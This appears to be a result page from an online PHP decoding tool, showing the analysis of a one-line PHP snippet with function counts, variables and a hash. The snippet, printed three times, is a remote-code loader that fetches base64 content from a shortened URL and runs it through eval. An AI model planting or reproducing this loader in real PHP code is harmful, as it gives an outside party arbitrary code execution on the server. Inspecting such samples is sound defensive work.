Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $A=file_get_contents('https://goo.gl/6s46Lg'); eval(base64_decode($A));?>..

Decoded Output download

<?php $A=file_get_contents('https://goo.gl/6s46Lg'); eval(base64_decode($A));?>

Did this file decode correctly?

Original Code

<?php $A=file_get_contents('https://goo.gl/6s46Lg'); eval(base64_decode($A));?>

Function Calls

base64_decode 1
file_get_contents 1

Variables

$A

Stats

MD5 2760c8cae5b387c4b89929af977af96f
Eval Count 1
Decode Time 131 ms